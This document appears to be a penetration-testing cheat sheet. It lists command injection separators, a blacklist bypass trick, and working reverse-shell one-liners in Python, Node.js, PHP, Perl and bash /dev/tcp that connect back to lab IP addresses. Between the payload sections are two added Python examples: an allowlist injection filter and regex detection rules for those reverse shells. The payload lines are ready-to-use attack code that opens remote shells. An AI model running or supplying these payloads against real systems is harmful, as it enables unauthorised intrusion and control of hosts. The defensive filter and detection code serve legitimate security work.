Tips:
- Remember to URL encode characters (especially &), otherwise they will break the payload.
- To escape double quotes in PHP inside double quotes, insert a backslash \ before the inner double quotes.
- World writable directories: /tmp, /var/tmp, /dev/shm
- Found SSH keys? chmod 600, and the key file needs an empty line at the end to work.
Operating System
Pipe:
|id
Semicolon (simultaneous run):
;id
&& (only run if the first command works):
&& id
Logical Or (only run if first command fails):
|| id
Linux only (wrapping command in backticks or $()):
`id`
$(id)
Blind injection cases:
;sleep 10
Linux specific tips:
To bypass a blacklist you can use the null statement $(); for example, wh$()oami is executed as whoami, because the shell removes the empty command substitution before running the command.
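The separators above (|, ;, &&, ||, backticks, $()) are exactly what a command injection filter has to contend with, and the wh$()oami trick is why a word blacklist is the wrong tool. The following added example (not from this page) contrasts a naive denylist with an allowlist and shows the hardened way to build the command: validate the input, then pass argv as a list so no shell ever parses it. The sample inputs, the ping use case and the hostname pattern are constructed for the demonstration.

```python
import re
from typing import Dict, List

# Constructed sample inputs (not from the page): benign hostnames followed
# by injection attempts built from the separators listed above.
SAMPLES = [
    "example.com",
    "catalog.example.com",
    "example.com;id",
    "example.com && id",
    "example.com || id",
    "example.com|id",
    "`id`",
    "$(id)",
    "wh$()oami",
]

# A naive word denylist. This is the kind of filter that wh$()oami defeats:
# the filter never sees the word "whoami", but the shell drops the empty
# $() substitution and runs whoami anyway. It also blocks benign input
# such as "catalog.example.com" because it contains "cat".
DENYLIST = ("whoami", "id", "cat")


def denylist_filter(value: str) -> bool:
    """Return True if value passes the denylist (weak: bypassable and noisy)."""
    return not any(word in value for word in DENYLIST)


# Allowlist: the only characters a hostname label may contain. Every
# metacharacter on this page (| ; & $ ( ) ` and space) is rejected by design.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def allowlist_filter(value: str) -> bool:
    """Return True only if value is a syntactically valid hostname."""
    return HOSTNAME_RE.fullmatch(value) is not None


def vulnerable_command(host: str) -> str:
    """The pattern to avoid: concatenating input into a string that a shell
    will parse (os.system, or subprocess with shell=True)."""
    return "ping -c 1 " + host


def hardened_command(host: str) -> List[str]:
    """Validate against the allowlist, then build argv as a list so that
    subprocess.run(argv) executes ping directly with no shell in between."""
    if not allowlist_filter(host):
        raise ValueError("rejected host: %r" % host)
    return ["ping", "-c", "1", host]


def audit(samples: List[str] = SAMPLES) -> Dict[str, Dict[str, bool]]:
    """For each sample, record whether each filter would let it through."""
    return {
        s: {"denylist": denylist_filter(s), "allowlist": allowlist_filter(s)}
        for s in samples
    }


if __name__ == "__main__":
    for sample, verdict in audit().items():
        print("%-22s denylist=%-5s allowlist=%s"
              % (sample, verdict["denylist"], verdict["allowlist"]))
```

Running the audit shows the two failure modes of the denylist side by side: wh$()oami passes it while a legitimate catalog.example.com is blocked, whereas the allowlist gets both right. The argv list returned by hardened_command is what should reach subprocess.run; never join it back into a string for a shell.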
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.51",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Node.js
echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js
PHP
php -r '$sock=fsockopen("192.168.45.199",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.199",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.199",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.199",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.199",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.45.199/443 0>&1'\");"
Diagnose using phpinfo(), not a shell:
php -r 'phpinfo();'
Perl
perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
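Every payload in this section leaves a distinctive process command line: an interpreter invoked with -c, -r or -e, a socket opened, and stdin/stdout/stderr redirected into it. That makes them good material for process-creation detection. The following added example (not from this page) encodes the shapes of the Python, Node.js, bash /dev/tcp, PHP fsockopen and Perl payloads above as regex rules and runs them over constructed process-execution log lines; the log format, the hostnames and the 203.0.113.0/24 addresses are placeholders assumed for the demonstration.

```python
import re
from typing import Dict, List

# Detection rules derived from the payload shapes in this section.
# Each entry is (rule name, regex applied to the process command line).
# They are deliberately loose so minor reformatting does not evade them.
RULES = [
    ("python_socket_dup2",
     re.compile(r"python\S*\s+-c\s+.*socket\.socket.*dup2")),
    ("bash_dev_tcp",
     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("nc_exec_flag",
     re.compile(r"\bnc\b.*\s-e\s+/bin/(?:ba)?sh")),
    ("php_fsockopen_exec",
     re.compile(r"fsockopen\(.*\b(?:exec|shell_exec|system|passthru|popen)\(")),
    ("perl_socket_exec",
     re.compile(r"perl\s+-e\s+.*use Socket;.*exec\(")),
    ("node_child_process_nc",
     re.compile(r"child_process.*\bnc\b")),
]

# Constructed process-execution log lines (hypothetical "key=value ... cmd=<cmdline>"
# format). Three benign lines are mixed in to check for false positives.
LOG_LINES = [
    "ts=2024-05-01T10:00:00Z host=web01 uid=33 cmd=php -r 'phpinfo();'",
    "ts=2024-05-01T10:00:05Z host=web01 uid=33 cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"203.0.113.10\",9090));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'",
    "ts=2024-05-01T10:00:09Z host=web01 uid=33 cmd=echo \"require('child_process').exec('nc -nv 203.0.113.10 9090 -e /bin/bash')\" > /var/tmp/x.js ; node /var/tmp/x.js",
    "ts=2024-05-01T10:00:12Z host=web01 uid=33 cmd=bash -c 'bash -i >& /dev/tcp/203.0.113.10/443 0>&1'",
    "ts=2024-05-01T10:00:15Z host=web01 uid=33 cmd=php -r '$sock=fsockopen(\"203.0.113.10\",9090);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "ts=2024-05-01T10:00:20Z host=web01 uid=33 cmd=perl -e 'use Socket;$i=\"203.0.113.10\";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
    "ts=2024-05-01T10:01:00Z host=web01 uid=1000 cmd=python3 -c 'print(1+1)'",
    "ts=2024-05-01T10:01:30Z host=web01 uid=1000 cmd=nc -z localhost 22",
]


def parse_line(line: str) -> Dict[str, str]:
    """Split a log line into its key=value fields plus the raw command line."""
    meta, _, cmd = line.partition(" cmd=")
    fields = dict(kv.split("=", 1) for kv in meta.split())
    fields["cmd"] = cmd
    return fields


def rules_for(cmd: str) -> List[str]:
    """Return the names of every rule that matches the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over every line; return one hit record per flagged line."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        matched = rules_for(rec["cmd"])
        if matched:
            hits.append({"host": rec["host"], "uid": rec["uid"],
                         "rules": matched, "cmd": rec["cmd"]})
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print("%s uid=%s %s: %s" % (hit["host"], hit["uid"],
                                    ",".join(hit["rules"]), hit["cmd"][:70]))
```

The uid in each hit is worth keeping: a web server account (uid 33 here) spawning an interpreter with a socket is far more suspicious than an interactive user doing the same, and the phpinfo() and nc -z lines show that the rules key on the socket-plus-exec combination rather than on the interpreter or on netcat alone.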